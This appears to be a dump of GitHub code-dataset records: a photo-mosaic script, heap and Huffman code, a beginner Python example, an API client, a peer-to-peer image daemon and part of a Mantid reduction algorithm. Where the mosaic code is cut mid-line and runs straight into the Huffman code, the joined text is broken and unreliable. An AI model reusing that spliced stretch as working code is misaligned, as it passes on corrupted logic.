# référence\n\t\trgb=moyennepixels_ponderee(photo,photo.width,photo.height)#on trouve leur couleur moyenn et on l'ajoute au dictionnaire\n\t\tprint(\"Photo {0}\".format(all_images.index(filename)))\n\t\tmoyenne_pixels_photo[filename]=rgb\n\n\tphotos_connues=open(\"Photos avec moyennes connues.txt\",\"w\")#le dictionnaire écrit les nouvelles photos avec leurs couleurs moyennes\n\tfor nom_fichier in moyenne_pixels_photo.keys():\n\t\tphotos_connues.write(nom_fichier+\"|\"+str(moyenne_pixels_photo[nom_fichier])+\"|\")\n\tphotos_connues.close()\n\n\tprint(\"liste initialisée\")\n\ndef afficher():\n\t#on met dans un dictionnaire tous les noms des images dont on déjà trouvé la couleur moyenne, avec cette couleur moyenne associée\n\tmoyenne_pixels_photo={}\n\tphotos_connues=open(\"Photos avec moyennes connues.txt\",\"r\")\n\ttexte=photos_connues.read()\n\tphotos_connues.close()\n\tseparation=texte.split(\"|\")\n\tseparation.pop()\n\tfor i in range(0,len(separation),2):\n\t\tmoyenne_pixels_photo[eval(separation[i+1])]=separation[i]\n\n\t#le portrait est découpé en rectangles, on trouve la couleur moyenne de chaque zone, on trouve dans le dict\n\t#le filename dont la couleur moyenne est la plus proche, et on affiche cette image (redimensionnée) dans le rectangle du portrait.\n\tfor colonne in range(NB_COLONNES):\n\t\tprint(\"Colonne {0}\".format(colonne))\n\t\tfor ligne in range(NB_LIGNES):\n\t\t\tbox=(colonne*LARGEUR_PHOTOS,ligne*HAUTEUR_PHOTOS,colonne*LARGEUR_PHOTOS+LARGEUR_PHOTOS,ligne*HAUTEUR_PHOTOS+HAUTEUR_PHOTOS)\n\t\t\tregion=Objectif.crop(box)\n\t\t\tcouleur=moyennepixels_ponderee(region,region.width,region.height)\n\t\t\tmin_difference=10**6\n\t\t\tfor rgb in moyenne_pixels_photo.keys():\n\t\t\t\tdifference=abs(rgb[0]-couleur[0])+abs(rgb[1]-couleur[1])+abs(rgb[2]-couleur[2])\n\t\t\t\tif difference 1:\r\n Q, v1 = remove_min(Q)\r\n Q, v2 = remove_min(Q)\r\n Q = insert(Q, Node(v1.symbol + v2.symbol, v1.freq + v2.freq, v1, v2))\r\n return remove_min(Q)[1]\r\n\r\ndef __main__():\r\n # Heap\r\n A = [int(rnd.random()*100)]\r\n for i in range(5):\r\n n = int(rnd.random()*100)\r\n insert(A, n)\r\n print(f\"Heap A:{A}\")\r\n A, x = remove_min(A)\r\n print(f\"Remove element of heap A:\\n x = {x}, A = {A}\")\r\n\r\n # Huffman\r\n C = []\r\n for l in \"abcdefghijklmnopqrstuvwxyz\":\r\n C += [(l, int(rnd.random()*100))]\r\n h = huffman(C)\r\n print(f\"\\nHuffman:\\n{h}\")\r\n\r\nif __name__ == \"__main__\":\r\n __main__()\r\n","repo_name":"edvardlomo/algorithms","sub_path":"datastructures.py","file_name":"datastructures.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1608381495","text":"#-*- coding:utf-8 -*-\n# あなたはなんの動物かと尋ねてニンゲンですと答えないと終わらない\n# プログラムを作ってみます\n# 先に変数を用意します\nanswer = input(\"あなたはなんの動物ですか?\\n\")\n\n# while文でニンゲンですと答えるまで終わらないプログラムを書きます\nwhile answer != \"ニンゲン\":\n # 答えによっていろいろな反応を組み込んでみましょう\n if answer == \"ウチュウジン\":\n print(\"本当に!? 怖いのでさようなら!\\n\")\n # while ループを終了します\n break\n\n elif answer == \"カミサマ\":\n print(\"わお! 初めて合いました! ... 馬鹿にしないでちゃんと答えてください!\")\n # もう一度値を更新して,ループの最初に戻ります.\n answer = input(\"本当はあなたはなんの動物ですか?\\n\")\n continue\n\n # ニンゲンとウチュウジン,カミサマ以外は多分喋れないのでもう一度訪ねます\n else :\n print(\"嘘をつかないで!\" + answer + \"は喋れません\")\n #もう一度値を更新します\n answer = input(\"本当はあなたはなんの動物ですか?\\n\")\n\n # これはcontinue も breakもされなかった場合だけ実行されます\n print(\"こんどは真面目に答えましたか? \\n\")\n\n# breakで終わらなかった == ニンゲンだった場合の処理を書きます\nelse:\n print(\"そうですよね!ニンゲンに決まっています!\")\n","repo_name":"yakagika/stat_py","sub_path":"temp/who_are_you.py","file_name":"who_are_you.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18010487019","text":"import json\nimport os\nfrom typing import Any, Generator, Optional\n\nimport dateutil\nfrom celery.utils.log import get_logger\nfrom httpx import AsyncClient, HTTPStatusError, Timeout\n\nfrom .... import db\nfrom ...models import Transfer\nfrom .. import set_data_and_expiry\n\nCACHE_KEY_TEMPLATE_TRANSFERS = (\n \"covalent_transfer_items_{treasury_address}_{contract_address}_{chain_id}_{date}\"\n)\n\nKEY = os.getenv(\"COVALENT_KEY\")\nTRANSFERS_V2_URL_TEMPLATE = (\n \"https://api.covalenthq.com/v1/{chain_id}/address/{treasury_address}/transfers_v2/\"\n)\n\n\nasync def _get_transfer_items(\n treasury_address: str, contract_address: str, chain_id: int\n) -> Generator[dict[str, Any], None, None]:\n page_number = 0\n while True:\n async with AsyncClient(\n timeout=Timeout(10.0, read=60.0, connect=90.0)\n ) as client:\n resp = await client.get(\n TRANSFERS_V2_URL_TEMPLATE.format(\n chain_id=chain_id, treasury_address=treasury_address\n ),\n params={\n \"quote-currency\": \"USD\",\n \"format\": \"JSON\",\n \"contract-address\": contract_address,\n \"key\": f\"ckey_{KEY}\",\n \"page-number\": page_number,\n },\n )\n resp.raise_for_status()\n data = resp.json()[\"data\"]\n for item in data[\"items\"]:\n yield item\n if not data[\"pagination\"][\"has_more\"]:\n break\n page_number += 1\n\n\nTYPE_SIGN = {\"OUT\": -1, \"IN\": 1}\n\n\ndef _transfers_of_items(transfer_items: list[dict[str, Any]]):\n for block_transaction in transfer_items:\n block_date = dateutil.parser.parse(block_transaction[\"block_signed_at\"])\n for transfer in block_transaction[\"transfers\"]:\n delta = int(transfer[\"delta\"])\n decimals = int(transfer[\"contract_decimals\"])\n if decimals < 0:\n logger = get_logger(__name__)\n logger.error(\n \"Covalent returned negative decimals on contract %s %s %s\",\n transfer[\"contract_name\"],\n transfer[\"contract_ticker_symbol\"],\n transfer[\"contract_address\"],\n )\n amount = TYPE_SIGN[transfer[\"transfer_type\"]] * delta / 10**decimals\n yield Transfer(timestamp=block_date, amount=amount)\n\n\nasync def get_token_transfers(\n treasury_address: str, contract_address: str, chain_id: Optional[int] = 1\n) -> list[Transfer]:\n \"\"\"Returns a list of Transfer objects without balance, backwards in time\n\n Notes\n ---\n The historical token balancce of the given treasury is partial\n because, naturaly, covalent's transfers_v2 endpoint only returns\n historical transfers and doesn't return the balance at the time\n of transfer.\n\n Thus, the balance for a given treasury can only be calculated for\n the date of transfer from the covalent response.\n \"\"\"\n cache_date = dateutil.utils.today(dateutil.tz.UTC).strftime(\"%Y-%m-%d\")\n cache_key = CACHE_KEY_TEMPLATE_TRANSFERS.format(\n treasury_address=treasury_address,\n contract_address=contract_address,\n chain_id=chain_id,\n date=cache_date,\n )\n\n if db.exists(cache_key) > 0:\n transfer_items = json.loads(db.get(cache_key))\n else:\n try:\n transfer_items = [\n _\n async for _ in _get_transfer_items(\n treasury_address, contract_address, chain_id\n )\n ]\n except (\n HTTPStatusError,\n json.decoder.JSONDecodeError,\n KeyError,\n ) as error:\n logger = get_logger(__name__)\n if error.__class__ is HTTPStatusError:\n logger.error(\n \"unable to receive a Covalent `transfers_v2` API response\",\n exc_info=error,\n )\n logger.error(\n \"error processing Covalent `transfers_v2` API response\", exc_info=error\n )\n raise\n\n set_data_and_expiry(cache_key, json.dumps(transfer_items), db)\n\n return list(_transfers_of_items(transfer_items))\n","repo_name":"butterymoney/whip","sub_path":"backend/app/treasury/adapters/covalent/transfers_v2.py","file_name":"transfers_v2.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"15535358842","text":"from typing import (\n List,\n)\nfrom lintcode import (\n Interval,\n)\n\n\"\"\"\nDefinition of Interval:\nclass Interval(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param intervals: an array of meeting time intervals\n @return: the minimum number of conference rooms required\n \"\"\"\n def min_meeting_rooms(self, intervals: List[Interval]) -> int:\n # Write your code here\n import heapq\n heap = []\n\n if not intervals:\n return 0\n\n intervals = sorted(intervals, key= lambda x: x.start)\n\n heapq.heappush(heap, intervals[0].end)\n\n for i in range(1, len(intervals)):\n meeting_end = heapq.heappop(heap)\n if meeting_end > intervals[i].start:\n heapq.heappush(heap, meeting_end)\n heapq.heappush(heap, intervals[i].end)\n\n return len(heap)\n","repo_name":"peterolive/leetcode-question-everyday","sub_path":"MeetingRoomsII.py","file_name":"MeetingRoomsII.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27710836844","text":"import unittest\n\nfrom oandav20.testing import TestCase\n\n\nclass TestPositionsMixin(TestCase):\n\n def test_get_positions_method(self):\n positions = self.oanda.get_positions()\n assert len(positions[\"positions\"]) > 0\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"luca-heltai/oandav20","sub_path":"tests/test_positions_endpoints.py","file_name":"test_positions_endpoints.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8746920575","text":"#!/usr/bin/env python\nfrom distutils.core import setup\nfrom setuptools import find_packages\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nsetup(\n name='scary-cat',\n install_requires=requirements,\n packages=find_packages(),\n entry_points = {\n 'console_scripts': ['scary-cat=scary_cat:main']\n }\n)\n","repo_name":"ashley/scary-cat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"38027446834","text":"\nfrom ast import Break\nfrom os import listdir\nimport os\nimport socket\nfrom os.path import isfile, join\nfrom webbrowser import get\nimport imagehash\nfrom PIL import Image\nimport selectors\nimport time\nimport ast\nfrom requests import request\nfrom src.protocol import CDProto, Message,RegisterMessage, RequestInfo\nimport base64\n\n\nclass daemon:\n \"\"\"Daemon object\"\"\"\n\n def __init__(self,host: str, port: int,connectingNode: int,isMaster : bool = False, imagesFolder: str = \"\"):\n # Server details, host (or ip) to bind to and the port\n self.host = host\n self.port = port\n self.imagesFolder = imagesFolder\n # Events are send back to the given callback\n self.sel = selectors.DefaultSelector()\n\n\n self.isMaster = isMaster\n self.connectingNode = connectingNode\n # Create a unique ID for each node if the ID is not given.\n if isMaster:\n self.port = 5000\n self.id = \"master\"\n else:\n self.id = str(port) # Make sure the ID is a string!\n\n # Start the TCP/IP server\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.init_server()\n\n # PROTOCOL PARA ENVIO DE MENSAGENS E AFINS\n self.protocol = CDProto()\n self.connections = {}\n self.clientConnections = {}\n\n # For image Control \n# Images have as an Identifier their name. The localImages Dict matches the identifier with their respective imagehash\n# -----------------------\n# UPDATE----> Now localImages will actually contain matches the identifier with their respective imagehash but also size of the image and Number of colors;\n# PIL.Image.size\n# im = Image.open(r\"C:\\Users\\System-Pc\\Desktop\\lion.png\").convert(\"L\") \n# im1 = Image.Image.getcolors(im) \n# dict = {id: [hash,with,height,numberofcolors]}\n \n# Update on this\n\n# Actually this is Dumb I should just use the size of bytes in a image\n# The more bytes it has the more information it holds the better it is so we keep that one in the DS\n\n\n self.imagesFolder = imagesFolder\n self.localImages, self.hashes = self.imageHashing(imagesFolder)\n self.imagesinNetwork = {}\n self.imagesinNetwork.update(self.imagesmapConn())\n\n\n self.backupDone = False\n\n \n def init_server(self) -> None:\n \"\"\"Initialization of the TCP/IP server to receive connections. It binds to the given host and port.\"\"\"\n print(f\"Initialisation of the Node on port: {self.port} on node ({self.id})\")\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sock.bind((self.host, self.port))\n self.sock.settimeout(10.0)\n self.sock.listen(1)\n\n def imagesmapConn(self):\n newdict = {}\n for key,value in self.localImages.items():\n valor = value\n valor.append(\"this\")\n newdict[key] = valor\n #print(newdict.get(key))\n\n return newdict\n\n def getList(self,dict):\n list = []\n for key in dict.keys():\n list.append(key)\n\n return list\n \n def accept(self,sock, mask):\n conn, addr = sock.accept() # Should be ready\n #print('accepted', conn, 'from', addr)\n self.sel.register(conn, selectors.EVENT_READ, self.read)\n\n def SendConnections(self):\n for i in self.connections.values():\n self.protocol.send_msg(i,self.protocol.connectionUpdate(self.getList(self.connections)))\n\n def read(self,conn, mask):\n mensagem = self.protocol.recv_msg(conn)\n if mensagem == None:\n return\n if mensagem.command == \"disconected\":\n self.sel.unregister(conn)\n #print(\"Closed \" ,conn) \n for key, value in self.connections.items():\n if value == conn:\n del self.connections[key]\n break\n #print(self.connections.keys())\n return\n elif mensagem.command == \"register\":\n address = (mensagem.host,mensagem.port)\n self.connections[address] = conn\n self.SendConnections()\n #print(self.connections.keys())\n\n return\n elif mensagem.command == \"ConnectionUpdate\":\n #print(mensagem.connections)\n for i in mensagem.connections:\n if (i[0],i[1]) not in self.connections and (i[0],i[1]) != (self.host,self.port):\n sock = self.connect(i[0],i[1])\n self.Register(sock,self.host,self.port)\n self.SendImageInfo(sock)\n self.RequestImageInfo(sock)\n #print(self.connections.keys())\n elif mensagem.command == \"ImageInfo\":\n d = ast.literal_eval(mensagem.images)\n dicio = {}\n for i in d.keys():\n hashcode = d.get(i)[0]\n size = d.get(i)[1]\n for localim in self.localImages.values():\n if hashcode == localim[0]:\n if size > localim[1]:\n self.deletefromhere(hashcode)\n #print(size , \">\" , localim[1])\n dicio[i] = [hashcode,size,conn]\n elif size < localim[1]:\n self.deletefromThem(conn,hashcode)\n #print(size ,\"<\" , localim[1])\n else:\n dicio[i] = [hashcode,size,conn]\n self.deletefromhere(hashcode)\n #print(\"else\")\n\n break\n else:\n dicio[i] = [hashcode,size,conn]\n\n self.imagesinNetwork.update(dicio)\n if self.backupDone == False:\n self.doBackUp()\n self.backupDone =True\n #print(self.imagesinNetwork)\n elif mensagem.command == \"RequestInfo\":\n self.SendImageInfo(conn)\n elif mensagem.command == \"DeleteImage\":\n self.deleteImage(mensagem.has)\n elif mensagem.command == \"registerClient\":\n self.clientConnections[mensagem.name] = conn\n #print(self.clientConnections)\n elif mensagem.command == \"GetImageList\":\n lista = self.imagesinNetwork.keys()\n mensagem = self.protocol.ListOfImages(list(lista))\n self.protocol.send_msg(conn,mensagem)\n elif mensagem.command == \"GetImageRequest\":\n if mensagem.imageName not in list(self.imagesinNetwork.keys()):\n self.protocol.send_msg(conn,self.protocol.notfound())\n return\n if mensagem.imageName in list(self.localImages.keys()):\n encodedImg = self.imageToText(mensagem.imageName)\n message = self.protocol.actualImage(encodedImg)\n self.protocol.send_msg(conn,message)\n else:\n array = self.imagesinNetwork.get(mensagem.imageName)\n for key,value in self.clientConnections.items():\n if value == conn:\n mensagem = self.protocol.askforImage(mensagem.imageName,key)\n self.protocol.send_msg(array[2],mensagem)\n elif mensagem.command == \"AskforImage\":\n encodedImg = self.imageToText(mensagem.imageName)\n message = self.protocol.sendtoDeamon(encodedImg,mensagem.user)\n self.protocol.send_msg(conn,message)\n elif mensagem.command == \"sendToDeamon\":\n mens= self.protocol.actualImage(mensagem.imagem)\n self.protocol.send_msg(self.clientConnections[mensagem.user],mens)\n\n\n def imageHashing(self,Folder):\n \"\"\"\"IMAGE HASHING\n Will hash all the images from our local folder using the imagehash library\n \"\"\" \n imageHashes = {} # name : hash\n\n hashes = []\n files = [f for f in listdir(Folder) if isfile(join(Folder, f))]\n\n \n for currentImage in files:\n hash = imagehash.average_hash(Image.open(Folder + currentImage))\n if (hash.__str__() in imageHashes.values()):\n #print(\"Image \"+ (Folder + currentImage)+\" is repeated.\"+ \" It was Removed\")\n os.remove(Folder + currentImage)\n continue\n #print(currentImage + \" \" + hash.__str__())\n imageHashes[currentImage] = hash.__str__()\n\n for i in imageHashes.keys():\n tamanho = os.stat(Folder + i).st_size\n hashes.append(imageHashes.get(i))\n imageHashes[i] = [imageHashes.get(i),tamanho]\n\n #print(imageHashes)\n return imageHashes ,hashes\n \n \n def loop(self):\n \n if not self.isMaster:\n self.MasterSock = self.connect(\"localhost\",self.connectingNode)\n self.Register(self.MasterSock,self.host,self.port)\n self.connections[(\"localhost\",self.connectingNode)] = self.MasterSock\n self.RequestImageInfo(self.MasterSock)\n\n\n\n self.sel.register(self.sock, selectors.EVENT_READ, self.accept)\n while True:\n events = self.sel.select()\n for key, mask in events:\n callback = key.data\n callback(key.fileobj, mask)\n\n def deleteImage(self,imageName):\n #print(\"Deleting from here \"+ imageName)\n for key, value in self.localImages.items():\n if value[0] == imageName: \n #print(\"Deleting from here \"+ key)\n \n os.remove(self.imagesFolder + key)\n \n self.localImages.pop(key)\n\n\n\n\n def deletefromhere(self,hashcode):\n #print(\"Deleting from here \"+hashcode)\n\n for key,value in self.localImages.items():\n if value[0] == hashcode:\n #DeleteActualFIle\n os.remove(self.imagesFolder + key)\n\n\n #Remove From Dict\n self.localImages.pop(key)\n break\n\n\n\n def deletefromThem(self,sock,hashcode):\n #print(\"Deleting from THe other Node \"+hashcode)\n mensagem = self.protocol.Deleteimages(hashcode)\n self.protocol.send_msg(sock,mensagem)\n\n\n def Register(self,sock,host,port):\n mensagem = self.protocol.register(host,port)\n self.protocol.send_msg(sock,mensagem)\n\n self.SendImageInfo(sock)\n\n def SendImageInfo(self, sock):\n mensagem = self.protocol.imageInfo(self.localImages)\n self.protocol.send_msg(sock,mensagem)\n\n def RequestImageInfo(self,sock):\n mensagem = self.protocol.requestInfo()\n self.protocol.send_msg(sock,mensagem)\n\n # Used for debugging as no purpuse, just like as all\n def sendStr(self,sock: socket,Message):\n sock.sendall(str.encode(Message))\n\n def connect(self,host,port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host,port))\n sock.setblocking(False)\n self.sel.register(sock, selectors.EVENT_READ, self.read)\n return sock\n \n def imageToText(self,imageName):\n with open(self.imagesFolder + imageName, \"rb\") as file:\n encoded_img = base64.b64encode(file.read()).decode('utf-8')\n\n return encoded_img\n\n def doBackUp(self):\n for key, value in self.connections.items():\n #print(key)\n pass\n\n","repo_name":"Rafael-Remigio/Distributed-Photo-Organizer","sub_path":"src/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":11484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"7684569636","text":"from mantid.kernel import *\nfrom mantid.api import *\nfrom mantid.simpleapi import *\nfrom mantid import config\n\nimport os\n\n\ndef _str_or_none(s):\n return s if s != \"\" else None\n\n\ndef _ws_or_none(s):\n return mtd[s] if s != \"\" else None\n\n\ndef _elems_or_none(l):\n return l if len(l) != 0 else None\n\n\ndef add_missing_elements(from_list, to_list):\n to_list.extend([element for element in from_list if element not in to_list])\n return sorted(to_list)\n\n\nclass ISISIndirectEnergyTransfer(DataProcessorAlgorithm):\n _chopped_data = None\n _data_files = None\n _load_logs = None\n _calibration_ws = None\n _instrument_name = None\n _analyser = None\n _reflection = None\n _efixed = None\n _spectra_range = None\n _background_range = None\n _rebin_string = None\n _detailed_balance = None\n _scale_factor = None\n _fold_multiple_frames = None\n _grouping_method = None\n _grouping_ws = None\n _grouping_string = None\n _grouping_map_file = None\n _output_x_units = None\n _output_ws = None\n _sum_files = None\n _ipf_filename = None\n _workspace_names = None\n\n def category(self):\n return \"Workflow\\\\Inelastic;Inelastic\\\\Indirect\"\n\n def summary(self):\n return \"Runs an energy transfer reduction for an inelastic indirect geometry instrument.\"\n\n def PyInit(self):\n # Input properties\n self.declareProperty(StringArrayProperty(name=\"InputFiles\"), doc=\"Comma separated list of input files\")\n\n self.declareProperty(name=\"SumFiles\", defaultValue=False, doc=\"Toggle input file summing or sequential processing\")\n\n self.declareProperty(name=\"LoadLogFiles\", defaultValue=True, doc=\"Load log files when loading runs\")\n\n self.declareProperty(\n WorkspaceProperty(\"CalibrationWorkspace\", \"\", direction=Direction.Input, optional=PropertyMode.Optional),\n doc=\"Workspace containing calibration data\",\n )\n\n # Instrument configuration properties\n self.declareProperty(\n name=\"Instrument\",\n defaultValue=\"\",\n validator=StringListValidator([\"IRIS\", \"OSIRIS\", \"TOSCA\", \"TFXA\"]),\n doc=\"Instrument used during run.\",\n )\n self.declareProperty(\n name=\"Analyser\",\n defaultValue=\"\",\n validator=StringListValidator([\"graphite\", \"mica\", \"fmica\", \"silicon\"]),\n doc=\"Analyser bank used during run.\",\n )\n self.declareProperty(\n name=\"Reflection\",\n defaultValue=\"\",\n validator=StringListValidator([\"002\", \"004\", \"006\", \"111\", \"333\"]),\n doc=\"Reflection number for instrument setup during run.\",\n )\n\n self.declareProperty(\n name=\"Efixed\",\n defaultValue=Property.EMPTY_DBL,\n validator=FloatBoundedValidator(0.0),\n doc=\"Overrides the default Efixed value for the analyser/reflection selection.\",\n )\n\n self.declareProperty(\n IntArrayProperty(name=\"SpectraRange\", values=[0, 1], validator=IntArrayMandatoryValidator()),\n doc=\"Comma separated range of spectra number to use.\",\n )\n self.declareProperty(\n FloatArrayProperty(name=\"BackgroundRange\"), doc=\"Range of background to subtract from raw data in time of flight.\"\n )\n self.declareProperty(name=\"RebinString\", defaultValue=\"\", doc=\"Rebin string parameters.\")\n self.declareProperty(name=\"DetailedBalance\", defaultValue=Property.EMPTY_DBL, doc=\"\")\n self.declareProperty(name=\"ScaleFactor\", defaultValue=1.0, doc=\"Factor by which to scale result.\")\n self.declareProperty(name=\"FoldMultipleFrames\", defaultValue=True, doc=\"Folds multiple framed data sets into a single workspace.\")\n\n # Spectra grouping options\n self.declareProperty(\n name=\"GroupingMethod\",\n defaultValue=\"IPF\",\n validator=StringListValidator([\"Individual\", \"All\", \"File\", \"Workspace\", \"IPF\", \"Custom\"]),\n doc=\"Method used to group spectra.\",\n )\n self.declareProperty(\n WorkspaceProperty(\"GroupingWorkspace\", \"\", direction=Direction.Input, optional=PropertyMode.Optional),\n doc=\"Workspace containing spectra grouping.\",\n )\n self.declareProperty(name=\"GroupingString\", defaultValue=\"\", direction=Direction.Input, doc=\"Spectra to group as string\")\n self.declareProperty(\n FileProperty(\"MapFile\", \"\", action=FileAction.OptionalLoad, extensions=[\".map\"]), doc=\"Workspace containing spectra grouping.\"\n )\n\n # Output properties\n self.declareProperty(\n name=\"UnitX\",\n defaultValue=\"DeltaE\",\n validator=StringListValidator([\"DeltaE\", \"DeltaE_inWavenumber\"]),\n doc=\"X axis units for the result workspace.\",\n )\n\n self.declareProperty(\n WorkspaceGroupProperty(\"OutputWorkspace\", \"\", direction=Direction.Output), doc=\"Workspace group for the resulting workspaces.\"\n )\n\n # pylint: disable=too-many-locals\n def PyExec(self):\n from IndirectReductionCommon import (\n load_files,\n get_multi_frame_rebin,\n get_detectors_to_mask,\n unwrap_monitor,\n process_monitor_efficiency,\n scale_monitor,\n scale_detectors,\n rebin_reduction,\n group_spectra,\n fold_chopped,\n rename_reduction,\n )\n\n self._setup()\n load_prog = Progress(self, start=0.0, end=0.10, nreports=2)\n load_prog.report(\"loading files\")\n self._workspace_names, self._chopped_data, masked_detectors = load_files(\n self._data_files,\n self._ipf_filename,\n self._spectra_range[0],\n self._spectra_range[1],\n self._sum_files,\n self._load_logs,\n None,\n self._sum_files,\n )\n load_prog.report(\"files loaded\")\n\n process_prog = Progress(self, start=0.1, end=0.9, nreports=len(self._workspace_names))\n for c_ws_name in self._workspace_names:\n process_prog.report(\"processing workspace\" + c_ws_name)\n is_multi_frame = isinstance(mtd[c_ws_name], WorkspaceGroup)\n\n # Get list of workspaces\n if is_multi_frame:\n workspaces = mtd[c_ws_name].getNames()\n else:\n workspaces = [c_ws_name]\n\n # Process rebinning for framed data\n rebin_string_2, num_bins = get_multi_frame_rebin(c_ws_name, self._rebin_string)\n\n if not self._sum_files:\n masked_detectors = get_detectors_to_mask(workspaces)\n else:\n summed_file_masked_detectors = get_detectors_to_mask(workspaces)\n masked_detectors = add_missing_elements(summed_file_masked_detectors, masked_detectors)\n\n # Process workspaces\n for ws_name in workspaces:\n # Set Efixed if given to algorithm\n if self._efixed != Property.EMPTY_DBL:\n SetInstrumentParameter(\n Workspace=ws_name,\n ComponentName=self._analyser,\n ParameterName=\"Efixed\",\n ParameterType=\"Number\",\n Value=str(self._efixed),\n )\n\n monitor_ws_name = ws_name + \"_mon\"\n\n # Process monitor\n if not unwrap_monitor(ws_name):\n ConvertUnits(InputWorkspace=monitor_ws_name, OutputWorkspace=monitor_ws_name, Target=\"Wavelength\", EMode=\"Elastic\")\n\n process_monitor_efficiency(ws_name)\n scale_monitor(ws_name)\n\n # Do background removal if a range was provided\n if self._background_range is not None:\n ConvertToDistribution(Workspace=ws_name)\n CalculateFlatBackground(\n InputWorkspace=ws_name,\n OutputWorkspace=ws_name,\n StartX=self._background_range[0],\n EndX=self._background_range[1],\n Mode=\"Mean\",\n )\n ConvertFromDistribution(Workspace=ws_name)\n\n # Divide by the calibration workspace if one was provided\n if self._calibration_ws is not None:\n index_min = self._calibration_ws.getIndexFromSpectrumNumber(int(self._spectra_range[0]))\n index_max = self._calibration_ws.getIndexFromSpectrumNumber(int(self._spectra_range[1]))\n\n CropWorkspace(\n InputWorkspace=self._calibration_ws,\n OutputWorkspace=\"__cropped_calib\",\n StartWorkspaceIndex=index_min,\n EndWorkspaceIndex=index_max,\n )\n\n Divide(LHSWorkspace=ws_name, RHSWorkspace=\"__cropped_calib\", OutputWorkspace=ws_name)\n\n DeleteWorkspace(\"__cropped_calib\")\n\n # Scale detector data by monitor intensities\n scale_detectors(ws_name, \"Indirect\")\n\n # Remove the no longer needed monitor workspace\n DeleteWorkspace(monitor_ws_name)\n\n # Convert to energy\n ConvertUnits(InputWorkspace=ws_name, OutputWorkspace=ws_name, Target=\"DeltaE\", EMode=\"Indirect\")\n CorrectKiKf(InputWorkspace=ws_name, OutputWorkspace=ws_name, EMode=\"Indirect\")\n\n # Handle rebinning\n rebin_reduction(ws_name, self._rebin_string, rebin_string_2, num_bins)\n\n # Detailed balance\n if self._detailed_balance != Property.EMPTY_DBL:\n corr_factor = 11.606 / (2 * self._detailed_balance)\n ExponentialCorrection(InputWorkspace=ws_name, OutputWorkspace=ws_name, C0=1.0, C1=corr_factor, Operation=\"Multiply\")\n\n # Scale\n if self._scale_factor != 1.0:\n Scale(InputWorkspace=ws_name, OutputWorkspace=ws_name, Factor=self._scale_factor, Operation=\"Multiply\")\n\n # Group spectra\n group_spectra(\n ws_name,\n masked_detectors=masked_detectors,\n method=self._grouping_method,\n group_file=self._grouping_map_file,\n group_ws=self._grouping_ws,\n group_string=self._grouping_string,\n )\n\n if self._fold_multiple_frames and is_multi_frame:\n fold_chopped(c_ws_name)\n\n # Convert to output units if needed\n if self._output_x_units != \"DeltaE\":\n ConvertUnits(InputWorkspace=c_ws_name, OutputWorkspace=c_ws_name, EMode=\"Indirect\", Target=self._output_x_units)\n\n # Rename output workspaces\n output_workspace_names = [rename_reduction(ws_name, self._sum_files) for ws_name in self._workspace_names]\n\n summary_prog = Progress(self, start=0.9, end=1.0, nreports=4)\n\n # Group result workspaces\n summary_prog.report(\"grouping workspaces\")\n self.output_ws = GroupWorkspaces(InputWorkspaces=output_workspace_names, OutputWorkspace=self._output_ws)\n\n # The spectrum numbers need to start at 1 not 0 if spectra are grouped\n if self.output_ws.getNumberOfEntries() == 1:\n for i in range(len(self.output_ws.getItem(0).getSpectrumNumbers())):\n self.output_ws.getItem(0).getSpectrum(i).setSpectrumNo(i + 1)\n\n self.setProperty(\"OutputWorkspace\", mtd[self._output_ws])\n\n summary_prog.report(\"Algorithm complete\")\n\n def validateInputs(self):\n \"\"\"\n Validates algorithm properties.\n \"\"\"\n issues = dict()\n\n # Validate the instrument configuration by checking if a parameter file exists\n instrument_name = self.getPropertyValue(\"Instrument\")\n analyser = self.getPropertyValue(\"Analyser\")\n reflection = self.getPropertyValue(\"Reflection\")\n\n ipf_filename = os.path.join(\n config[\"instrumentDefinition.directory\"], instrument_name + \"_\" + analyser + \"_\" + reflection + \"_Parameters.xml\"\n )\n\n if not os.path.exists(ipf_filename):\n error_message = \"Invalid instrument configuration\"\n issues[\"Instrument\"] = error_message\n issues[\"Analyser\"] = error_message\n issues[\"Reflection\"] = error_message\n\n # Validate spectra range\n spectra_range = self.getProperty(\"SpectraRange\").value\n if len(spectra_range) != 2:\n issues[\"SpectraRange\"] = \"Range must contain exactly two items\"\n elif spectra_range[0] > spectra_range[1]:\n issues[\"SpectraRange\"] = \"Range must be in format: lower,upper\"\n\n # Validate background range\n background_range = _elems_or_none(self.getProperty(\"BackgroundRange\").value)\n if background_range is not None:\n if len(background_range) != 2:\n issues[\"BackgroundRange\"] = \"Range must contain exactly two items\"\n elif background_range[0] > background_range[1]:\n issues[\"BackgroundRange\"] = \"Range must be in format: lower,upper\"\n\n # Validate grouping method\n grouping_method = self.getPropertyValue(\"GroupingMethod\")\n grouping_ws = _ws_or_none(self.getPropertyValue(\"GroupingWorkspace\"))\n\n if grouping_method == \"Workspace\" and grouping_ws is None:\n issues[\"GroupingWorkspace\"] = \"Must select a grouping workspace for current GroupingWorkspace\"\n\n efixed = self.getProperty(\"Efixed\").value\n if efixed != Property.EMPTY_DBL and instrument_name not in [\"IRIS\", 